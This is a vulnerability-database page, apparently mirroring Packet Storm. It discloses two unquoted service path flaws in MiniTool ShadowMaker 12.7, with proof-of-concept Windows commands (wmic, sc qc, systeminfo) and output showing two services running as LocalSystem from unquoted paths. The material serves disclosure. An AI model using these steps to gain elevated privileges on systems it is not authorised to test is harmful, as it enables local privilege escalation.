Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormIdan MalihiPACKETSTORM:173363
HistoryJul 11, 2023 - 12:00 a.m.

MiniTool Partition Wizard ShadowMaker 12.7 Unquoted Service Path

2023-07-1100:00:00
Idan Malihi
packetstormsecurity.com
114
minitool partition wizard
shadowmaker
unquoted service path
exploit
cve-2023-36164
cve-2023-36165
windows 10

0 Low

EPSS

Percentile

0.0%

JSON
`# Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path  
# Date: 06/07/2023  
# Exploit Author: Idan Malihi  
# Vendor Homepage: https://www.minitool.com/  
# Software Link: https://www.minitool.com/download-center/  
# Version: 12.7  
# Tested on: Microsoft Windows 10 Pro  
# CVE : CVE-2023-36164  
  
# PoC  
  
C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """  
MTAgentService MTAgentService C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe Auto  
  
C:\Users>sc qc MTAgentService  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: MTAgentService  
TYPE : 110 WIN32_OWN_PROCESS (interactive)  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : MTAgentService  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem  
  
C:\Users>systeminfo  
  
Host Name: DESKTOP-LA7J17P  
OS Name: Microsoft Windows 10 Pro  
OS Version: 10.0.19042 N/A Build 19042  
OS Manufacturer: Microsoft Corporation# Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path  
  
  
  
  
  
  
  
# Date: 06/07/2023  
# Exploit Author: Idan Malihi  
# Vendor Homepage: https://www.minitool.com/  
# Software Link: https://www.minitool.com/download-center/  
# Version: 12.7  
# Tested on: Microsoft Windows 10 Pro  
# CVE : CVE-2023-36165  
  
#PoC  
  
C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """  
MTSchedulerService MTSchedulerService C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe Auto  
  
C:\Users>sc qc MTSchedulerService  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: MTSchedulerService  
TYPE : 110 WIN32_OWN_PROCESS (interactive)  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : MTSchedulerService  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem  
  
C:\Users>systeminfo  
  
Host Name: DESKTOP-LA7J17P  
OS Name: Microsoft Windows 10 Pro  
OS Version: 10.0.19042 N/A Build 19042  
OS Manufacturer: Microsoft Corporation  
`

Related

nvd 2
cve 2
cvelist 2
zdt 2
exploitdb 2
nvd
nvd
CVE-2023-36165
2023-07-15 22:15:11
CVE-2023-36164
2023-07-11 14:15:09
cve
cve
CVE-2023-36165
2023-07-15 22:15:11
CVE-2023-36164
2023-07-11 14:15:09
cvelist
cvelist
CVE-2023-36165
1976-01-01 00:00:00
CVE-2023-36164
1976-01-01 00:00:00
zdt
zdt
MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path (MTAgentService) Vulnerability
2023-07-11 00:00:00
MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path (MTSchedulerService) Vulnerabil
2023-07-11 00:00:00
exploitdb
exploitdb
MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path "MTSchedulerService"
2023-07-11 00:00:00
MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path "MTAgentService"
2023-07-11 00:00:00

0 Low

EPSS

Percentile

0.0%

JSON
Related for PACKETSTORM:173363
nvd2cve2cvelist2zdt2exploitdb2